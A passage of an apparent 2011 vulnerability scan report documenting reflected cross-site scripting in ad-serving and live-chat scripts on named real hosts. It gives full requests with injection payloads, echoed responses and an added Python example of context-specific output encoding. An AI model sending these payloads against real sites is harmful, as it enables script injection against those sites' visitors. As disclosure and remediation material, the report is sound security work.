| Confidence: | Certain |
| Host: | http://js.revsci.net |
| Path: | /gateway/gw.js |
Issue detail
The value of the clen request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31fab'%3balert(1)//0fad37552c8 was submitted in the clen parameter. This input was echoed as 31fab';alert(1)//0fad37552c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=32831fab'%3balert(1)//0fad37552c8&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.tmz.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=optout
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sat, 17 Sep 2011 00:52:35 GMT Cache-Control: max-age=86400, private Expires: Sun, 18 Sep 2011 00:52:35 GMT X-Proc-ms: 1 Content-Type: application/javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 00:52:34 GMT Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) var rsi_now= new Date(); var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da ...[SNIP]... csid); if(window[rsi_csid])window[rsi_csid].rsi_ral(1);else rsi_ral(1); if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r(); A10868.DM_addEncToLoc('ver', '2.2'); A10868.DM_addEncToLoc('clen','32831fab';alert(1)//0fad37552c8'); A10868.DM_addEncToLoc('vid', '27200'); A10868.DM_addEncToLoc('pid', '261950'); A10868.DM_addEncToLoc('pli', '3449146'); A10868.DM_addEncToLoc('sid', '2298003'); A10868.DM_addEncToLoc('ali', '332902 ...[SNIP]...
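The remediation note above advises against echoing user data into a script at all. Where a parameter such as clen must be written into generated JavaScript, the practical fix is output encoding chosen for the exact context. The example below is added here for illustration; it is not code from this report or from the operators of js.revsci.net or the other hosts listed, and the names js_string_literal, html_attr and the emit_* functions are assumed for the illustration. It rebuilds the vulnerable DM_addEncToLoc('clen', '...') concatenation from the response above beside a hardened version, and goes beyond this entry to cover the double-quoted attribute context of the RealMedia entries later in this section, whose fix is HTML attribute encoding rather than JavaScript string encoding.

```python
import html
import json

# Added example: context-specific output encoding for the two reflection contexts in
# this report. Function names are illustrative; the hosts in the report run Java
# (Apache-Coyote) and nginx/PHP and their real emitting code is not shown anywhere.


def js_string_literal(value):
    """Encode value as a JavaScript string literal that cannot terminate the string,
    an enclosing <script> element, or an enclosing block comment.

    json.dumps already escapes the quote, backslash and control characters and, with
    ensure_ascii=True, writes U+2028/U+2029 (JS line terminators) as \\u escapes.
    It leaves '<', '>' and '/' alone, so '</script>' and '*/' would pass through;
    those three characters are escaped here as well (all valid JS string escapes)."""
    encoded = json.dumps(str(value), ensure_ascii=True)
    return (encoded.replace('<', '\\u003c')
                   .replace('>', '\\u003e')
                   .replace('/', '\\/'))


def html_attr(value):
    """Encode value for a double- or single-quoted HTML attribute value."""
    return html.escape(str(value), quote=True)


# --- vulnerable emitters, modelled on the reflected responses in this report ---

def emit_loc_param_vulnerable(name, value):
    # Raw concatenation into a single-quoted literal: a "'" in value ends the string.
    return "A10868.DM_addEncToLoc('%s', '%s');" % (name, value)


def emit_click_link_vulnerable(path):
    # Raw concatenation into a double-quoted attribute: '">' in path closes it.
    return '<A HREF="%s" target="_top">' % path


# --- hardened emitters ---

def emit_loc_param_fixed(name, value):
    return "A10868.DM_addEncToLoc(%s, %s);" % (js_string_literal(name),
                                               js_string_literal(value))


def emit_click_link_fixed(path):
    return '<A HREF="%s" target="_top">' % html_attr(path)


def reflected_verbatim(output, payload):
    """True if the scanner payload survives unchanged, i.e. the encoder did nothing."""
    return payload in output


def roundtrip_ok(value):
    """The encoded literal must still denote exactly value (JSON accepts \\/ and \\uXXXX)."""
    return json.loads(js_string_literal(value)) == value


if __name__ == '__main__':
    clen = "31fab';alert(1)//0fad37552c8"                # payload from issue 4.123
    rest10 = '35aa8"><script>alert(1)</script>e320abbb45e'  # payload from issue 4.133
    print(emit_loc_param_vulnerable('clen', '328' + clen))
    print(emit_loc_param_fixed('clen', '328' + clen))
    print(emit_click_link_vulnerable('/x75' + rest10))
    print(emit_click_link_fixed('/x75' + rest10))
```

json.dumps is used as the JavaScript string encoder because JSON string syntax is accepted by JavaScript; the extra escaping of <, > and / matters only when the literal can end up inside an HTML <script> element or a block comment, but it costs nothing and removes two classic bypasses. The attribute encoder is deliberately separate: &quot; is meaningless inside a JavaScript string, and \" is meaningless inside an HTML attribute, so one encoder cannot serve both contexts.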
4.124. http://js.revsci.net/gateway/gw.js [csid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://js.revsci.net
Path: /gateway/gw.js
Issue detail
The value of the csid request parameter is reflected in the application's response. The payload 7ec98<script>alert(1)</script>b1efe77bc87 was submitted in the csid parameter. Unlike the other gw.js findings, the response shown below is not a script that uses the value: it is a 128-byte application/javascript error stub in which the unrecognised customer code is echoed, converted to upper case (A108687EC98<SCRIPT>ALERT(1)</SCRIPT>B1EFE77BC87), inside a /* ... */ block comment.
The reflection is real, but the scanner's classification (plain text between HTML tags, echoed unmodified) does not match the response. Inside a JavaScript comment in a JavaScript resource a <script> tag is inert, and the case conversion turns alert into ALERT. A working proof of concept would have to close the comment with */ and tolerate the upper-casing; none is shown here, so the High/Certain rating should be re-verified rather than taken at face value.
Request
GET /gateway/gw.js?auto=t&csid=A108687ec98<script>alert(1)</script>b1efe77bc87&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:29 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:29 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:29 GMT
Content-Length: 128
/* * JavaScript include error: * The customer code "A108687EC98<SCRIPT>ALERT(1)</SCRIPT>B1EFE77BC87" was not recognized. */
4.125. http://js.revsci.net/gateway/gw.js [p parameter]
Summary
Severity: High
Confidence: Certain
Host: http://js.revsci.net
Path: /gateway/gw.js
Issue detail
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91982'%3balert(1)//e1948788f29 was submitted in the p parameter. This input was echoed as 91982';alert(1)//e1948788f29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=9991982'%3balert(1)//e1948788f29&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:50 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:50 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:50 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) var rsi_now= new Date(); var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da ...[SNIP]... '); A10868.DM_addEncToLoc('pli', '3449146'); A10868.DM_addEncToLoc('sid', '2298003'); A10868.DM_addEncToLoc('ali', '3329023'); A10868.DM_addEncToLoc('cid', '10288627'); A10868.DM_addEncToLoc('p', '9991982';alert(1)//e1948788f29'); A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/'); if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();
4.126. http://js.revsci.net/gateway/gw.js [pid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://js.revsci.net
Path: /gateway/gw.js
Issue detail
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b443'%3balert(1)//a35e45272ee was submitted in the pid parameter. This input was echoed as 5b443';alert(1)//a35e45272ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=2619505b443'%3balert(1)//a35e45272ee&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:41 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:41 GMT
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:41 GMT
Content-Length: 5217
//AG 13.0.0-21371 CM-1 (2011-09-16 13:59:30 UTC) var rsi_now= new Date(); var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da) ...[SNIP]... ow[rsi_csid])window[rsi_csid].rsi_r();else rsi_r(); A10868.DM_addEncToLoc('ver', '2.2'); A10868.DM_addEncToLoc('clen','328'); A10868.DM_addEncToLoc('vid', '27200'); A10868.DM_addEncToLoc('pid', '2619505b443';alert(1)//a35e45272ee'); A10868.DM_addEncToLoc('pli', '3449146'); A10868.DM_addEncToLoc('sid', '2298003'); A10868.DM_addEncToLoc('ali', '3329023'); A10868.DM_addEncToLoc('cid', '10288627'); A10868.DM_addEncToLoc('p', '99 ...[SNIP]...
4.127. http://js.revsci.net/gateway/gw.js [pli parameter]
Summary
Severity: High
Confidence: Certain
Host: http://js.revsci.net
Path: /gateway/gw.js
Issue detail
The value of the pli request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61d4e'%3balert(1)//bb7df706fb4 was submitted in the pli parameter. This input was echoed as 61d4e';alert(1)//bb7df706fb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=344914661d4e'%3balert(1)//bb7df706fb4&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:42 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:42 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:41 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) var rsi_now= new Date(); var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da ...[SNIP]... e rsi_r(); A10868.DM_addEncToLoc('ver', '2.2'); A10868.DM_addEncToLoc('clen','328'); A10868.DM_addEncToLoc('vid', '27200'); A10868.DM_addEncToLoc('pid', '261950'); A10868.DM_addEncToLoc('pli', '344914661d4e';alert(1)//bb7df706fb4'); A10868.DM_addEncToLoc('sid', '2298003'); A10868.DM_addEncToLoc('ali', '3329023'); A10868.DM_addEncToLoc('cid', '10288627'); A10868.DM_addEncToLoc('p', '99'); A10868.DM_addEncToLoc('ref', 'http:// ...[SNIP]...
4.128. http://js.revsci.net/gateway/gw.js [ref parameter]
Summary
Severity: High
Confidence: Certain
Host: http://js.revsci.net
Path: /gateway/gw.js
Issue detail
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce66b'%3balert(1)//a655a638949 was submitted in the ref parameter. This input was echoed as ce66b';alert(1)//a655a638949 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/ce66b'%3balert(1)//a655a638949& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:53 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:53 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:52 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) var rsi_now= new Date(); var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da ...[SNIP]... M_addEncToLoc('sid', '2298003'); A10868.DM_addEncToLoc('ali', '3329023'); A10868.DM_addEncToLoc('cid', '10288627'); A10868.DM_addEncToLoc('p', '99'); A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/ce66b';alert(1)//a655a638949'); if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();
4.129. http://js.revsci.net/gateway/gw.js [sid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://js.revsci.net
Path: /gateway/gw.js
Issue detail
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbb14'%3balert(1)//5c7df914983 was submitted in the sid parameter. This input was echoed as fbb14';alert(1)//5c7df914983 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003fbb14'%3balert(1)//5c7df914983&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:45 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:45 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:44 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) var rsi_now= new Date(); var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da ...[SNIP]... 2.2'); A10868.DM_addEncToLoc('clen','328'); A10868.DM_addEncToLoc('vid', '27200'); A10868.DM_addEncToLoc('pid', '261950'); A10868.DM_addEncToLoc('pli', '3449146'); A10868.DM_addEncToLoc('sid', '2298003fbb14';alert(1)//5c7df914983'); A10868.DM_addEncToLoc('ali', '3329023'); A10868.DM_addEncToLoc('cid', '10288627'); A10868.DM_addEncToLoc('p', '99'); A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/'); if(window[rsi_csid])windo ...[SNIP]...
4.130. http://js.revsci.net/gateway/gw.js [ver parameter]
Summary
Severity: High
Confidence: Certain
Host: http://js.revsci.net
Path: /gateway/gw.js
Issue detail
The value of the ver request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31763'%3balert(1)//9a116341702 was submitted in the ver parameter. This input was echoed as 31763';alert(1)//9a116341702 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.231763'%3balert(1)//9a116341702&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:32 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:32 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:31 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) var rsi_now= new Date(); var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da ...[SNIP]... ;}window[rsi_csid]=new rsiClient(rsi_csid); if(window[rsi_csid])window[rsi_csid].rsi_ral(1);else rsi_ral(1); if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r(); A10868.DM_addEncToLoc('ver', '2.231763';alert(1)//9a116341702'); A10868.DM_addEncToLoc('clen','328'); A10868.DM_addEncToLoc('vid', '27200'); A10868.DM_addEncToLoc('pid', '261950'); A10868.DM_addEncToLoc('pli', '3449146'); A10868.DM_addEncToLoc('sid', '2298003'); ...[SNIP]...
4.131. http://js.revsci.net/gateway/gw.js [vid parameter]
Summary
Severity: High
Confidence: Certain
Host: http://js.revsci.net
Path: /gateway/gw.js
Issue detail
The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69e1a'%3balert(1)//d8a16318306 was submitted in the vid parameter. This input was echoed as 69e1a';alert(1)//d8a16318306 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=2720069e1a'%3balert(1)//d8a16318306&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:40 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:40 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:39 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) var rsi_now= new Date(); var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da ...[SNIP]... sid].rsi_ral(1);else rsi_ral(1); if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r(); A10868.DM_addEncToLoc('ver', '2.2'); A10868.DM_addEncToLoc('clen','328'); A10868.DM_addEncToLoc('vid', '2720069e1a';alert(1)//d8a16318306'); A10868.DM_addEncToLoc('pid', '261950'); A10868.DM_addEncToLoc('pli', '3449146'); A10868.DM_addEncToLoc('sid', '2298003'); A10868.DM_addEncToLoc('ali', '3329023'); A10868.DM_addEncToLoc('cid', '1028 ...[SNIP]...
4.132. http://livechat.iadvize.com/rpc/referrer.php [get parameter]
Summary
Severity: High
Confidence: Certain
Host: http://livechat.iadvize.com
Path: /rpc/referrer.php
Issue detail
The value of the get request parameter is reflected in the application's response, which is served as text/javascript. The payload 276c3<script>alert(1)</script>2f89cc1f134 was submitted in the get parameter and was echoed unmodified inside a single-quoted JavaScript string: iAdvize.vStats['origin_site'] = '276c3<script>alert(1)</script>2f89cc1f134';. The same value is also written, URL-encoded, into the origin_site field of the 1821_idzp cookie that the response sets.
The scanner labels the context as plain text between HTML tags, but the response body is JavaScript, so a <script> tag on its own does not leave the string literal. The question that decides exploitability is whether a single quote or a backslash in the get parameter is escaped before it is placed between the quotes; that probe is not part of this entry, so the reflection is confirmed but the executable proof of concept is not.
Request
GET /rpc/referrer.php?s=1821&get=276c3<script>alert(1)</script>2f89cc1f134&random=1316228161329 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62; 1821vvc=3; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A1000%7D; 1821_idz=XnclJ01Pg6id2FcJU13kUkMfaXVNV%2F8gxkjQn8hBPcG6LNaooz40h%2BMaW0hQlsjGSRD%2BkhBEQXtHEo8uNUWZDoUCReT5yO90BLxF%2FLlYyUr51FG%2FyyfLpChY7rUtOwVCw8l%2Fg3u5V7ZarDSzVOiKi6RLcJ2O
Response
HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Fri, 16 Sep 2011 21:55:15 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"
Set-Cookie: 1821_idzp=%7B%22site_id%22%3A1821%2C%22lang%22%3A%22en%22%2C%22pageview%22%3A3%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2Ffeatures%22%2C%22timeElapsed%22%3A21936835.17%2C%22navTime%22%3A1316210110000%2C%22origin_site%22%3A%22276c3%3Cscript%3Ealert%281%29%3C%5C%2Fscript%3E2f89cc1f134%22%2C%22origin%22%3A%22website%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%7D; path=/
Vary: Accept-Encoding
Content-Length: 215
iAdvize.vStats['origin_site'] = '276c3<script>alert(1)</script>2f89cc1f134';iAdvize.vStats['origin'] = 'website';iAdvize.vStats['refengine'] = '';iAdvize.vStats['refkeyword'] = '';iAdvize.util.delScript('referrer');
4.133. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]
Summary
Severity: High
Confidence: Certain
Host: http://network.realmedia.com
Path: /RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75
Issue detail
The value of REST URL parameter 10 is copied into the value of an HTML tag attribute (the HREF of an <A> element) which is encapsulated in double quotation marks. The payload 35aa8"><script>alert(1)</script>e320abbb45e was submitted in REST URL parameter 10 and was echoed unmodified in the application's response, which is served as text/html: the "> sequence closes the attribute and the <A> tag, so the <script> element that follows is parsed as markup.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x7535aa8"><script>alert(1)</script>e320abbb45e HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:13:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:14:58 GMT;path=/;httponly
<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/256834064/x7535aa8"><script>alert(1)</script>e320abbb45e/default/empty.gif/4d686437616b357a3837594141787878?" target="_top"> ...[SNIP]...
4.134. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]
Summary
Severity: High
Confidence: Certain
Host: http://network.realmedia.com
Path: /RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75
Issue detail
